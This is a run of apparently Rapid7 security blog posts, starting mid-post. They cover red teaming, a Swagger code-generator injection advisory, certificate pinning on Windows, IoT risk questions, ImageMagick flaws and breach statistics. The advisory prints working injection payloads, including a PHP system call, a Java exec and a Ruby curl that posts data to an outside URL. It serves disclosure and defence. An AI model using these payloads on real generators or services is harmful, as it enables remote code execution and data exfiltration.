A member of the Red Team poses as a FedEx delivery driver and accesses the building. Once inside, the Team member plants a device on the network for easy remote access. This device tunnels out using a common port allowed outbound, such as port 80, 443, or 53 (HTTP, HTTPS, or DNS), and establishes a command and control (C2) channel to the Red Team’s servers. Another Team member picks up the C2 channel and pivots around the network, possibly using insecure printers or other devices to draw attention away from the planted device. The Team members then pivot through the network until they reach their goal, taking their time to avoid detection.

 

This is just one of innumerable ways a Red Team may operate, but it is a good example of some tests we have performed.

 


 

So... Pirates or Ninjas?

 

Back to pirates vs. ninjas. If you guessed that Penetration Testers are pirates and Red Teams are ninjas, you are correct. Is one better than the other? Often Penetration Testers and Red Teams are the same people, using different methods and techniques for different assessments. The true answer in Penetration Test vs. Red Team is just like pirates vs. ninjas; one is not necessarily better than the other. Each is useful in certain situations. You would not want to use pirates to perform stealth operations and you would not want to use ninjas to sail the seas looking for treasure. Similarly, you would not want to use a Penetration Test to judge how good your incident response is, and you would not want to perform a Red Team Assessment to discover as many vulnerabilities as possible.

This disclosure addresses a class of vulnerabilities in Swagger code generators in which injectable parameters in a Swagger JSON or YAML file facilitate remote code execution. This vulnerability applies to NodeJS, PHP, Ruby, and Java, and probably other languages as well. Other code generation tools may also be vulnerable to parameter injection and could be affected by this approach. By leveraging this vulnerability, an attacker can embed arbitrary executable code in a client or server that is generated automatically to interact with the described service. This is considered an abuse of trust in the definition of service, and could be an interesting space for further research.

 

According to swagger.io - “Swagger is a simple yet powerful representation of your RESTful API. With the largest ecosystem of API tooling on the planet, thousands of developers are supporting Swagger in almost every modern programming language and deployment environment. With a Swagger-enabled API, you get interactive documentation, client SDK generation, and discoverability.”

 

Within the Swagger ecosystem, there are fantastic code generators which are designed to automagically take a Swagger document and then generate stub client code for the described API. This is a powerful part of the solution that makes it easy for companies to provide developers the ability to quickly make use of their APIs. The Swagger definitions are flexible enough to describe most RESTful APIs and give developers a great starting point for their API clients. The problem discussed here is that several of these code generators do not take into account the possibility of a malicious Swagger definition document, which results in a classic parameter injection with a new twist on code generation.

 

Maliciously crafted Swagger documents can be used to dynamically create HTTP API clients and servers with embedded arbitrary code execution in the underlying operating system. This is possible because some parsers/generators trust insufficiently sanitized parameters within a Swagger document when generating a client code base.

  • On the client side, a vulnerability exists in trusting a malicious Swagger document to create any generated code base locally, most often in the form of a dynamically generated API client.
  • On the server side, a vulnerability exists in a service that consumes Swagger to dynamically generate and serve API clients, server mocks and testing specs.

Client Side

swagger-codegen contains a template-driven engine to generate client code in different languages by parsing a Swagger Resource Declaration. It is packaged or referenced in several open source and public services provided by smartbear.com, such as generator.swagger.io, editor.swagger.io, and swaggerhub.com. Other commercial products include restlet.com (restlet-studio) and restunited.com. These services appear to generate and store these artifacts (but not execute them), and the artifacts can be publicly downloaded and consumed. Remote code execution is achieved when the downloaded artifact is executed on the target.

Server Side

Online services that consume Swagger documents and automatically generate and execute server-side applications, test specs, and mock servers provide a potential for remote code execution. Some identified commercial platforms that follow this model include: vRest.io, ritc.io, restunited.com, stoplight.io, and runscope.com.

Credit

These issues were discovered by Scott Davis of Rapid7, Inc., and reported in accordance with Rapid7's disclosure policy.

Exploitation

Please see the associated Metasploit exploit module for examples for the following languages.

swagger-codegen

Swagger-codegen generates client and server code based on a Swagger document, which it trusts to specify inline variables in code unescaped (i.e., unescaped handlebars template variables). The JavaScript, HTML, PHP, Ruby, and Java clients were tested for parameter injection vulnerabilities; examples are given below.

javascript (node)

Strings within keys inside the 'paths' object of a Swagger document can be written in the following manner and generate executable NodeJS.

"paths": {        
     "/a');};};return exports;}));console.log('RCE');(function(){}(this,function(){a=function(){b=function(){new Array('": {

 

html

Strings within the 'description' object of a Swagger document can be written with html 'script' tags, and loaded unescaped into a browser.

"info": {        
     "description": "<script>alert(1)</script>",

 

php

Strings within the 'description' object in the definitions section of a Swagger document can inject comments and inline php code.

"definitions": {        
     "d": {            
          "type": "object",            
          "description": "*/ echo system(chr(0x6c).chr(0x73)); /*",

 

ruby

Strings in 'description' and 'title' of a Swagger document can be used in unison to terminate block comments, and inject inline ruby code.

"info": {        
     "description": "=begin",
     "title": "=end `curl -X POST -d \"fizz=buzz\" http://requestb.in/1ftnzfy1`"

java

Strings within keys inside the 'paths' object of a Swagger document can be written in the following manner and generate executable Java.

"paths": {        
     "/a\"; try{java.lang.Runtime.getRuntime().exec(\"ls\");}catch(Exception e){} \"": 

 

Mitigations

Until code generators are patched by their maintainers, users are advised to carefully inspect Swagger documents for language-specific escape sequences.
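A rough sketch of what such an inspection could look like, assuming a Python environment; the character and token list is illustrative and by no means exhaustive.

import json
import re

# Characters and sequences that have no business in the keys or descriptions of a
# trustworthy Swagger/OAS 2.0 document; illustrative, not exhaustive.
SUSPICIOUS = re.compile(r'''['"`;]|<script|\*/|=begin|=end''')

def flag_suspicious(node, path="$"):
    """Recursively walk a parsed Swagger document and print any suspicious keys or strings."""
    if isinstance(node, dict):
        for key, value in node.items():
            if SUSPICIOUS.search(str(key)):
                print(f"suspicious key at {path}: {key!r}")
            flag_suspicious(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            flag_suspicious(value, f"{path}[{i}]")
    elif isinstance(node, str) and SUSPICIOUS.search(node):
        print(f"suspicious string at {path}: {node!r}")

with open("swagger.json") as fh:   # hypothetical document under review
    flag_suspicious(json.load(fh))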

 

Fixes need to be implemented by those creating code generation tools; in general, this does not apply to the Swagger documents themselves. Mitigations for all issues include properly escaping parameters before injecting them into generated code, taking into account the context in which each variable is used (inline code, comments, quoted strings), and ensuring sanitization is in place so that a trusted API specification cannot lead to remote code execution in the known, easily avoidable cases.

 

For example, using double braces ({{ }}) instead of triple braces ({{{ }}}) in handlebars templates will usually prevent many types of injection attacks that involve single- or double-quote termination; however, this will not stop a determined attacker who can inject variables, absent sanitization logic, into multi-line comments, inline code, or other variables.
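A quick illustration of that difference, assuming the Python pystache package (any spec-compliant Mustache implementation behaves similarly); the payload is the HTML example from the exploitation section above.

import pystache   # assumes the pystache package, a Mustache implementation for Python

payload = "<script>alert(1)</script>"

# {{ }} HTML-escapes the variable; {{{ }}} (or {{& }}) emits it verbatim.
print(pystache.render("{{description}}", {"description": payload}))
#  -> &lt;script&gt;alert(1)&lt;/script&gt;
print(pystache.render("{{{description}}}", {"description": payload}))
#  -> <script>alert(1)</script>

As noted above, escaping of this sort only addresses the HTML case; it does nothing for payloads that land inside comments or quoted code strings.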

 

Mustache templates

  • {{{ code }}} or {{& code}} can be vulnerable in template and sanitization logic
  • {{ code }} can be vulnerable given context language of template (e.g. block quote)

Where to be wary

  • inline code creation from variable
  • single ticks (') and quotes (") unescaped variable injection
  • block comment (initiator & terminator) injection

Where it gets tricky

  • Arbitrary Set delimiter redefinition {{=< >=}} <={{ }}=>
  • Runtime Partial templates {{> partial}}
  • set redefinition with alternate unescape {{=< >=}} <&foo> <={{ }}=>

What to do in general

  • prefer escaped variables always {{foo}}
  • enforce single-line for commented variables // {{foo}}
  • sanitize ' & " in variables before unescaped insertion
  • encode ', in single quoted path strings.
  • encode ", in double quoted path strings

 

It is recommended to consider usage of a sanitization tool such as the OWASP ESAPI.

For the time being, a Github Pull Request is offered here.

Disclosure Timeline

This vulnerability advisory was prepared in accordance with Rapid7's disclosure policy.

  • Tue, Apr 19, 2016: Attempted to contact the vendor and the API team at Swagger.io.
  • Mon, May 09, 2016: Details disclosed to CERT (VU#755216).
  • Thu, Jun 16, 2016: Proposed patch supplied to CERT.
  • Wed, Jun 23, 2016: CVE-2016-5641 assigned by CERT.
  • Thu, Jun 23, 2016: Public disclosure and Metasploit module released.
  • Thu, Jun 23, 2016: Fix offered to swagger-codegen.

 

Future of Swagger

As of January 1st, 2016, the Swagger Specification has been donated to the Open API Initiative (OAI) and is the foundation of the OpenAPI Specification.  However, the name ‘Swagger’ is still the preferred naming in many a dinner party and dad joke, and is used in this document when referring to an OAS 2.0 specification document.  In the typical case, a Swagger document defines a RESTful API.  It implements a subset of JSON Schema Draft 4.

Tomorrow, Adobe is expected to release a patch for CVE-2016-4171, which fixes a critical vulnerability in Flash 21.0.0.242 that Kaspersky reports is being used in active, targeted campaigns. Generally speaking, these sorts of pre-patch, zero day exploits don't see a lot of widespread use; they're too valuable to burn on random acts of hacking.

 

So, customers shouldn't be any more worried about their Flash installation base today than they were yesterday. However, as I explained almost a year ago, Flash remains a very popular vector for client side attacks, so we recommend you always treat it with caution, and disable it when not needed. This announcement is a great reminder to do that.

 

Since Flash's rise as a popular vector for exploitation, many organizations have taken defensive steps to ensure that Flash has the same click-to-play protections as Java in their desktop space, so those enterprises are in a better position to defend against this and the next Adobe Flash exploit.

 

Our product teams here at Rapid7 are alert to this news, and will be working up solutions in Nexpose and Metasploit to cover this vulnerability; this blog will be updated when those checks and modules are available. For Nexpose customers in particular, if you’ve opted into Nexpose Now, you can easily create dashboard cards to see all of your Adobe Flash vulnerabilities and the impact that this vulnerability has on your risk. You can also use Adaptive Security to set up a trigger for the vulnerability so that Nexpose automatically launches a scan for it as soon as the check is released.

Today, I'm happy to announce the latest research paper from Rapid7, National Exposure Index: Inferring Internet Security Posture by Country through Port Scanning, by Bob Rudis, Jon Hart, and me, Tod Beardsley. This research takes a look at one of the most foundational components of the internet: the millions and millions of individual services that live on the public IP network.

 

When people think about "the internet," they tend to think only of the one or two protocols that the World Wide Web runs on, HTTP and HTTPS. Of course, there are loads of other services, but which are actually in use, and at what rate? How much telnet, SSH, FTP, SMTP, or any of the other protocols that run on TCP/IP is actually in use today, where are they all located, and how much of it is inherently insecure due to running over non-encrypted, cleartext channels?

 

While projects like CAIDA and Shodan perform ongoing telemetry that covers important aspects of the internet, we here at Rapid7 are unaware of any ongoing effort to gauge the general deployment of services on public networks. So, we built our own, using Project Sonar, and we now have the tooling not only to answer these fundamental questions about the nature of the internet, but also to come up with more precise questions for specific lines of inquiry.
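Project Sonar's tooling is purpose-built and operates at internet scale, but the underlying measurement is conceptually simple; here is a toy sketch of a TCP connect check across a handful of ports, suitable only for hosts you are authorized to scan.

import socket

PORTS = [21, 22, 23, 25, 80, 443, 445]   # a few of the services discussed in the paper

def open_ports(host, timeout=2.0):
    """Return the subset of PORTS that accept a TCP connection on the given host."""
    found = []
    for port in PORTS:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                found.append(port)
        except OSError:
            pass
    return found

print(open_ports("192.0.2.10"))   # hypothetical, authorized target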

 

Can you name the top ten TCP protocols offered on the internet? You probably can guess the top two, but did you know that #7 is telnet? Yep, there are 15 million good old, reliable, usually unencrypted telnet servers out there, offering shells to anyone who cares to peek in on the cleartext password as it's being used.

 

We found some weird things on the national level, too. For instance, about 75% of the servers offering SMB/CIFS services - a (usually) Microsoft service for file sharing and remote administration for Windows machines -  reside in just six countries: the United States, China, Hong Kong, Belgium, Australia and Poland.

 

It's facts like these that made us realize that we have a fundamental gap in our awareness of the services deployed on the public side of firewalls the world over. This gap, in turn, makes it hard to truly understand what the internet is. So, the paper and the associated data we collected (and will continue to collect) can help us all get an understanding of what makes up one of the most significant technologies in use on Planet Earth.


So, you can score a copy of the paper, full of exciting graphs (and absolutely zero pie charts!) here. Or, if you're of a mind to dig into the data behind those graphs, you can score the summary data here and let us know what is lurking in there that you found surprising, shocking, or sobering.

Situations come up relatively frequently where a specific certificate authority, trusted by browsers and operating systems, acts in a way that the users of those products would consider untrustworthy.

 

In the enterprise, with services exposed to the Internet and employees traveling, working from Wi-Fi and other insecure connections, this is also a very important issue, as the use of some of these less than tasteful certificates could lead to data (and credential!) interception.

 

Fortunately, if you manage Windows systems, you can not only configure the list of trusted authorities, but you can also pin the appropriate one for each service you use.

 

Untrusting Certificate Authorities on Windows via GPO

 

Filippo Valsorda, from Cloudflare, discovered and disclosed that Symantec had created an intermediate certificate authority (CA) for Blue Coat, a company that provides network devices with the ability to inspect SSL/TLS.

 

While there are legitimate uses to these features in the enterprise, such a CA could allow anyone using it to intercept encrypted traffic. This is not the first time, and will probably not be the last time something like this happens, so being ready to revoke certificate authorities is an ability enterprises must have.

 

Filippo also posted a great tutorial on how to revoke it on OS X, and now links to Windows instructions, but this article also covers pinning and goes into a bit more detail.

 

In this post, we will look at doing it on Windows, in an Active Directory environment.

 

Whitelist Versus Blacklist

 

Windows does allow you to fully configure certificate authorities, which would be ideal from a security perspective: you keep full control of the approved authorities. However, that is a whitelist approach requiring additional management effort, since it involves replacing the certificates on all systems via GPO, and it risks breaking custom certificates installed for legitimate purposes. A whitelist should be a longer-term goal, but a blacklist approach can still be used right away.

 

In this case, start by downloading the certificate you want to block as a .crt file.

 

Create A Group Policy Object (GPO)

 

You could use an existing GPO or create a new one. The important thing to consider is that this will be a computer policy that should be linked to the OUs where your workstations are located. As with any GPO change, it is highly recommended to first link and filter this policy to specific testing workstations, considering that a mistake could end up breaking SSL/TLS connectivity on workstations.

 

[Screenshot: creating the GPO]

 

Edit the GPO, and under Computer Configuration/Windows Settings/Security Settings/Public Key Policies/Untrusted Certificates, right click in the right pane to get the Import option.

 

[Screenshot: the Import option under Untrusted Certificates]

 

The first wizard screen has greyed out options, as we are modifying a GPO. On the second one, simply browse to the CRT you downloaded. Ensure the imported certificate gets placed in Untrusted Certificates.

 

At this point, your GPO should look like this, and it is ready to distrust this certificate in the Windows certificate store on all machines where the policy is deployed.

 

GPO_output.png

 

Pinning Certificate Authorities Via GPO

 

Distrusting known bad certificates is one thing, but a very reliable way to ensure rogue certificates have no impact on corporate services is to pin the ones you expect. Pinning essentially configures the client device to accept only known good values for pre-configured SSL/TLS communications.

 

Pinning can be done very granularly, at the certificate/public key level, which would require a lot of management, but it can also be done at the certificate authority level, which is much easier to manage.

 

This allows us, for example, to configure systems so that communications with the Rapid7 website are only expected to use certificates issued by GoDaddy.

 

Rapid7dotcom.png
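If you are not sure which authority a given service actually uses today, you can check before writing the pin. A minimal sketch in Python; the hostname is just an example, and it inspects only the leaf certificate's issuer, not the full chain:

# Minimal sketch: show which certificate authority issued a site's leaf
# certificate, i.e. the authority you would consider pinning for that service.
# The hostname is an example; swap in the services your employees rely on.
import socket
import ssl

hostname = "www.rapid7.com"
context = ssl.create_default_context()

with socket.create_connection((hostname, 443), timeout=10) as sock:
    with context.wrap_socket(sock, server_hostname=hostname) as tls:
        cert = tls.getpeercert()

# getpeercert() returns the issuer as nested name/value pairs; flatten them.
issuer = {name: value for rdn in cert["issuer"] for name, value in rdn}
print("Issued by:", issuer.get("organizationName"), "/", issuer.get("commonName"))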

 

By applying this to the services used by traveling employees, you can ensure that captive portals, hotel and plane Wi-Fi environments, or even malicious attacks at the ISP level would have to forge a certificate from that very specific authority; presenting an illegitimate yet trusted certificate from any other authority would fail.

 

Deploy EMET

 

Deployment of EMET has already been covered briefly in our Whiteboard Wednesdays, and Microsoft includes great information about it with the installer. EMET must be deployed to the workstations where you wish to pin certificates. While its other mitigations are great for security, they are not covered in this post, which focuses only on certificate management.

 

Create A GPO For EMET

 

Again, a policy that applies to the appropriate computer objects must be created.

 

EMET itself comes with the appropriate files to create GPOs, located under Program Files\EMET\Deployment\Group Policy Files.

 

1. Copy the ADMX file to <SystemDrive>\Windows\PolicyDefinitions

2. Copy the ADML file to the <SystemDrive>\Windows\PolicyDefinitions\en-US folder

3. Re-open the GPO Management Console

4. You now have a new set of GPO options available under Computer Configuration\Administrative Templates\Windows Components\EMET

5. Enable Certificate Pinning Configuration.

6. In Pinned Sites, list all the URLs you want to protect, along with the name of the rule we will create.

7. In Pinning Rules, use the same rule name, then list the SHA-1 thumbprints of the certificates to accept, or of their issuing authorities. These rules can get very granular and can include expiration dates and more; please read the examples provided by Microsoft if you would like to use such advanced rules. When starting out, the EMET GUI makes it easier to see the kinds of rules that can be created than editing these relatively unfriendly GPO settings does.

8. In our example, we configure www.rapid7.com to only trust a SHA-1 thumbprint of OBVIOUSLYNOTAREALTHUMBPRINT. We configured this as a blocking rule that expires on Christmas 2020.

 

GPO.png

 

9. If you run the EMET GUI on a system where the GPO is applied, you'll see the new rule listed, denoted by the icon showing that it comes from a GPO.

 

fromGPO.png

10. If we now browse to Rapid7's website, we get a certificate warning, since the real certificate does not match the fake thumbprint. This is what would happen if a trusted but illegitimate certificate were at play in a man-in-the-middle attack.

 

certwarning.png

 

11. EMET logs an error to the Event Log, which you should absolutely detect and investigate (a quick way to spot-check a single machine for these events is sketched after this list).

 

event.png

 

12. Repeat this for all important services you use, such as webmail, single sign-on portals, reverse proxies, and SaaS providers. Additional protection for social network accounts can also be achieved this way.
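For step 11, here is a quick way to spot-check a single machine for those events; at scale you would forward them to your SIEM instead. A minimal sketch in Python, assuming EMET writes to the Application event log under the provider name "EMET" (verify the provider name for your EMET version):

# Minimal sketch: pull the most recent EMET events from the Application log
# on one Windows machine using the built-in wevtutil tool.
# Assumes the provider name is "EMET"; verify this for your EMET version.
import subprocess

query = "*[System[Provider[@Name='EMET']]]"
result = subprocess.run(
    ["wevtutil", "qe", "Application", "/q:" + query,
     "/f:text", "/c:20", "/rd:true"],  # 20 newest events, human-readable text
    capture_output=True, text=True, check=False,
)
print(result.stdout or "No EMET events found (or wevtutil is unavailable).")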

 

Warning: Edge does not seem to support this feature yet. You should also look into configuring any alternate browsers in use with similar rules to obtain better coverage. Again, this is the type of change that should be tested very thoroughly before being pushed to a significant number of workstations, but once done, you will have significantly reduced the chances of a successful man-in-the-middle attack and improved the odds of detecting one.

 

Enjoy your new GPOs!

Suchin Gururangan and I (I'm pretty much there for looks, which is an indicator that jenellis might need prescription lenses) will be speaking at SOURCE Boston this week about "doing data science" at "internet scale" and about how you can get started doing security data science at home or in your organization. So, come on over to learn more about the unique challenges associated with analyzing "security data", the evolution of IPv4 autonomous systems, where your adversaries may be squirreled away, and what information lies hidden in this seemingly innocuous square:

 

all.png

This blog post was written by Bob Rudis, Chief Security Data Scientist and Deral Heiland, Research Lead.

 

Organizations have been participating in the “Internet of Things” (IoT) for years, long before marketers put this new three-letter acronym together. HVAC monitoring/control, badge access, video surveillance systems and more all have had IP connectivity for ages. Today, more systems, processes and (for lack of a more precise word) gizmos are being connected to enterprise networks that fit into this IoT category. Some deliberately; some not.

 

network-782707_960_720.png

 

As organizations continue to adopt IoT solutions into their environments, they are faced with a number of hard questions, and in some cases they may not even know what those questions are. To help them avoid falling into a potentially deep and hazardous IoT pit, we’ve put together a few key questions that may help adopters better embrace and secure IoT technology within their organizations.

 

  1. What’s already there?
  2. Do we really need this? (i.e. making the business case for IoT)
  3. How does it connect and communicate (both internally and externally)?
  4. How is it accessed and controlled? (i.e. is there an “app for that” and who has access)
  5. What is the classification of the data? ( i.e. data handled and processed by IoT)
  6. Can we monitor and maintain these IoT devices?
  7. What are the failure modes? (i.e. what breaks if it breaks?)
  8. How does it fit in our threat models? (i.e. what is the impact if compromised?)

 

What’s already there?

This should be the first question. If you can’t answer it right now, you need to work with your teams to inventory what’s out there. These devices are, by definition, on your network, so you should be able to use your network scanner to find and inventory them. Work with your vendor to ensure they have support for identifying IoT devices.
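If your scanner does not fingerprint IoT gear well, even a rough sweep of the ports these devices commonly expose can help seed that inventory. A minimal sketch in Python; the subnet and port list are illustrative and no substitute for a real discovery scan:

# Minimal sketch: rough TCP sweep of ports commonly exposed by embedded/IoT
# devices (telnet, web consoles, RTSP video streams). The subnet and port
# list are illustrative; a real network scanner will fingerprint far better.
import ipaddress
import socket

SUBNET = "192.168.1.0/28"           # example range; keep sweeps small and authorized
PORTS = [23, 80, 443, 554, 8080]    # telnet, HTTP, HTTPS, RTSP, alt-HTTP

for host in ipaddress.ip_network(SUBNET).hosts():
    open_ports = []
    for port in PORTS:
        try:
            with socket.create_connection((str(host), port), timeout=0.5):
                open_ports.append(port)
        except OSError:
            pass                    # closed, filtered, or timed out
    if open_ports:
        print(host, "responds on", open_ports)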

 

Short of that, work with your procurement teams to see what products have been purchased that may have an IoT component. You should be able to do this by vendor or device name (you may need to look at the itemized purchase orders). Put out a call to action to your department peers to see what they may have deployed without your knowledge that may not have shown up on the books. Building/campus maintenance and security, app development, and system/app/network architecture departments are good places to start.

 

Do we really need this?

Let’s face it, these “things” are pretty cool and many of them are highly useful. It’s much more efficient to be able to deploy cameras or control environmental systems within a building or campus using modern network protocols and spiffy apps. But do you really need internet-enabled lights, televisions, and desktop assistants? Yeah, we’re looking at you, Alexa. The novelty effect of IoT should make “why” the first question you ask when considering investing in new “things," quickly followed by “what value does this bring to our organization?” If the answers do not meet the standards your organization has identified, then you should probably curb your IoT enthusiasm for a bit, or consider deploying the technology in an isolated environment with strong access controls that limit or prevent connectivity to the organization’s internal systems.

 

There are good business cases for IoT: increased efficiency, cost reduction, service/feature enhancements and more. You may even be in a situation where the “cool factor” is needed to attract new employees or customers. Only you know what meets the threshold of “need."

 

How does it connect and communicate?

There are many aspects to the concept of “communication” in IoT. Does it connect to the LAN, Wi-Fi network and/or 3G/4G for access/control? Does it employ ZigBee, Bluetooth or other low-power and/or mesh network features for distributed or direct communications? Does it use encryption for all, some or any communications? Can it work behind an authenticated proxy server or does it require a direct internet connection? What protocols does it use for communication?

 

Most of these are standard questions for any new technology adoption within an organization. One issue with IoT device communications is that their makers tend not to have enterprise deployments in mind: the vast majority require direct internet connections, communicate without encryption, and use new, low-power communication technologies that transmit data and control commands in cleartext.

 

An advertised feature of many IoT devices is that they store your data in “the cloud." Every question you currently ask about cloud deployments in your organization applies to IoT devices. The cloud connection and internal connection effectively make these “things” a custom data router from your network to some other network. Once you enable that connection, there’s almost nothing stopping it from going the other way. Be wary of sacrificing control for “cool."

 

To get answers to these questions, don’t just trust the manufacturer. Hold your own Proof of Concept deployment in controlled environments and monitor all communications as you change settings. Your regulatory requirements or just internal policy requirements may make the use of many IoT devices impossible without filing an exception and accepting the risks associated with the deployment.

 

How is it accessed and controlled?

IoT is often advertised as a plug-and-play technology. This means the builders tried to remove as much friction as possible from deployments to drive up adoption. This focus on ease of use is aimed at casual consumers, but many IoT devices have no “enterprise” counterpart. That is, you deploy the same exact devices in the same exact way both “at home” and “at work”. This means many devices will have no password, or only a simple static password, rather than the more detailed or elaborate controls you are used to in an enterprise. The vast majority have no concept of or support for two-factor or multi-factor authentication. And if you think the access control is weak, most have no concept of encryption on any communication channel either. If the built-in controls do not conform to your standard requirements, consider isolating the “management” side within a separate network - if that’s possible.

 

IoT device access is often done through a mobile app or web (internet) console. How are these mechanisms secured? How is the authentication and/or data secured in transit and on disk? Again, all the cloud service questions you already ask are valid here and you should be wary of relaxing standards without significant benefits.

 

What is the classification of the data?

Another key action to perform when deciding on an IoT implementation is to examine the data that is gathered and stored by these devices. By reviewing the data and properly classifying it into defined categories, we can better understand how the data is gathered, transmitted, and stored within our environment. This will also help us make better-informed decisions when we are faced with IoT technologies that store data in the cloud, or ones that also transmit voice and video information to the cloud. Data classification policies and procedures are important for all businesses to ensure that data is being properly handled within the organization. If you do not have such a practice, it is highly recommended that one be developed and that IoT data be included in those policies and procedures.

 

The Department of Energy—in conjunction with Sandia National Labs—has put together a guide to developing a Security Framework for Control System Data Classification and Protection[1] that can help you get started when applying data classification strategies to your own Internet of Things.

 

Can we monitor and maintain these IoT devices?

Unlike the makers of servers, routers, switches, and firewalls, IoT makers tend to sacrifice manageability for the ability to pack in cool features. Their idea of monitoring is often just a notification when a device fails to phone home or fails to upload data within a preset time interval. Do not lightly assume you will be able to use SNMP or an SSH connection to gather management telemetry. Verify and test management options before committing to a solution.

 

Patch management is also a critical concern when dealing with IoT technology. In this case we have to consider the full ecosystem of the deployed IoT solution, which could include the control hardware firmware, sensor hardware firmware, server software, and associated mobile application software. Ensuring that all of these segments are included in a comprehensive patch management program can be difficult. Depending on the IoT technology deployed, automated vendor patching may not be available; if that is the case, a self-managed solution will need to be implemented.

 

What are the failure modes?

A question often overlooked when considering the deployment of any technology, but especially with IoT: what happens if the technology fails to operate correctly? Can the business proceed without these services, or does failure lead to a security breakdown or the loss of critical data? Either way, it is important to identify methods to mitigate or reduce the impact of these failures, which may include introducing needed redundancy.

 

If you have no current process in place to analyze failure modes, a great place to start is a cyber-oriented failure mode and effect analysis (FMEA) framework[2] or something like Open FAIR[3] (factor analysis of information risk). Both enable you to quantify the outcomes of scenarios and help combat the urge to “make a gut call” when considering the possible negative outcomes of IoT deployments.

 

How does it fit within our threat models?

This question needs to be asked in tandem with the failure modes investigation. No system or device sits in isolation on your network, and attackers use the interconnectedness of systems to move laterally and find points of exposure to work from. You should be threat modeling your proposed IoT deployments the same way you do everything else. Look at where it lives, what lives around it, and what it does (including the data it transmits and what else it connects to, especially externally). Map out this graph to make sure it fits within the parameters of your current threat models, and expand them only if you absolutely have to.

 

The Internet of Things holds much promise, profit, and progress, but with that comes real risk and tangible exposure. We should not be afraid to embrace this technology, but we should do so in the safest and most secure ways possible. We hope these questions help you better assess the risk of the IoT you already have and of the IoT you will be adopting.

 


[1] Security Framework for Control System Data Classification and Protection: http://energy.gov/sites/prod/files/oeprod/DocumentsandMedia/21-Security_Framework_for_Data_Class.pdf

[2] Christoph Schmittner, Thomas Gruber, Peter Puschner, and Erwin Schoitsch. 2014. Security Application of Failure Mode and Effect Analysis (FMEA). In Proceedings of the 33rd International Conference on Computer Safety, Reliability, and Security - Volume 8666 (SAFECOMP 2014), Andrea Bondavalli and Felicita Di Giandomenico (Eds.), Vol. 8666. Springer-Verlag New York, Inc., New York, NY, USA, 310-325. DOI=http://dx.doi.org/10.1007/978-3-319-10506-2_21

[3] The OpenFAIR body of knowledge: http://www.opengroup.org/subjectareas/security/risk

ImageMagick Vulnerabilities and Exploits

 

On Tuesday, the ImageMagick project posted a vulnerability disclosure notification on their official project forum regarding a vulnerability present in some of its coders. The post details a mitigation strategy that seems effective, based on creating a more restricted policy.xml that governs resource usage by ImageMagick components.
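One quick way to confirm that a restricted policy is actually the one ImageMagick loads is to ask ImageMagick itself. A minimal sketch in Python, assuming the ImageMagick command-line tools are installed and that your policy denies the coders named in the advisory (EPHEMERAL, URL, HTTPS, MVG, MSL); the exact output format varies between ImageMagick versions:

# Minimal sketch: dump the policy ImageMagick is actually using so you can
# confirm the advisory's coders are denied. Assumes the ImageMagick CLI
# ("convert") is installed; output formatting varies by version.
import subprocess

result = subprocess.run(
    ["convert", "-list", "policy"],
    capture_output=True, text=True, check=False,
)
print(result.stdout)

# Very rough sanity check: flag coders that never appear in the active policy.
# The rights ("none") for each entry still need to be confirmed by eye.
for coder in ("EPHEMERAL", "URL", "HTTPS", "MVG", "MSL"):
    if coder not in result.stdout.upper():
        print("WARNING: no policy entry mentions", coder)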

 

Essentially, the ImageMagick vulnerabilities are a combination of a file-type confusion vulnerability (where the ImageMagick components do not correctly identify a file's format) and a command injection vulnerability (where the filtering mechanisms for guarding against shell escapes are insufficient).

 

How worried should I be?

 

The public disclosure happened in the first place because the vulnerabilities were already being exploited by unknown actors, as reported by Ryan Huber. As he predicted, published exploits from security researchers targeting the affected components are emerging in short order, including a Metasploit module authored by William Vu and HD Moore.

 

As reported by Dan Goodin, ImageMagick components are common in several web application frameworks, so the threat is fairly serious for any web site operator that is using one of those affected technologies. Since ImageMagick is a component used in several stacks, patches are not universally available yet.

 

What's next?

 

Website operators should immediately determine their use of ImageMagick components in image processing and implement the referenced policy.xml mitigation while awaiting an updated package that fixes the identified vulnerabilities. Restricting the file formats accepted by ImageMagick to just the few that are actually needed, such as PNG, JPG, and GIF, is always a good strategy for sites where it makes sense. ImageMagick parses hundreds of file formats, which is part of its usefulness, but also part of its attack surface.
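If you control the upload path, verifying that a file's magic bytes match one of the few formats you actually accept, before ImageMagick ever sees it, removes a lot of that attack surface. A minimal sketch in Python; the function name and the accepted-format set are illustrative:

# Minimal sketch: check a file's magic bytes against the few image formats a
# site actually accepts before handing it to ImageMagick. The function name
# and the accepted formats are illustrative.
import sys

MAGIC_BYTES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpeg": b"\xff\xd8\xff",
    "gif87a": b"GIF87a",
    "gif89a": b"GIF89a",
}

def looks_like_allowed_image(path):
    """Return True only if the file starts with an allowed image signature."""
    with open(path, "rb") as f:
        header = f.read(16)
    return any(header.startswith(sig) for sig in MAGIC_BYTES.values())

if __name__ == "__main__":
    for name in sys.argv[1:]:
        print(name, "OK" if looks_like_allowed_image(name) else "REJECTED")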

 

Are any Rapid7 products affected?

No Rapid7 products are affected by this vulnerability.

Verizon has released the 2016 edition of their annual Data Breach Investigations Report (DBIR). Their crack team of researchers has, once again, produced one of the most respected, data-driven reports in cyber security, sifting through submissions from 67 contributors and taking a deep dive into 64,000+ incidents—and nearly 2,300 breaches—to help provide insight on what our adversaries are up to and how successful they've been.

 

The DBIR is a highly anticipated research project and has valuable information for many groups. Policy makers use it to defend legislation; pundits and media use it to crank out scary articles; other researchers and academics take the insights in the report and identify new avenues to explore; and vendors quickly identify product and services areas that are aligned with the major findings. Yet, the data in the report is of paramount import to defenders. With over 80 pages to wade through, we thought it might be helpful to provide some way-points that you could use to navigate through this year's breach and incident map.

 

Bigger is…Better?

 

There are a couple "gotchas" with data submitted to the DBIR team. The first is that a big chunk of data comes from the U.S. public sector where there are mandatory reporting laws, regulations, and requirements. The second is the YUGE number of Unknowns. The DBIR acknowledges this, and it's still valuable to look at the data when there are "knowns" even with this grey (okay, ours is green below) blob of uncertainty in the mix. You can easily find your industry in DBIR Tables 1 & 2 (pages 3 & 4) and if we pivot on that data we can see the distribution of the percentage of incidents that are breaches:

 

2016-verizon-data-breach-report-fig-1-1.png

We've removed the "Public (92)" industry from this set to get a better sense of what's happening across general industries. For the DBIR, there were more submissions of incidents with confirmed data disclosure for smaller organizations than large (i.e. be careful out there SMBs), but there's also a big pile of Unknowns:

 

2016-verizon-data-breach-report-fig-2-1.png

We can also take another, discrete view of this by industry:

 

2016-verizon-data-breach-report-fig-3-1.png

 

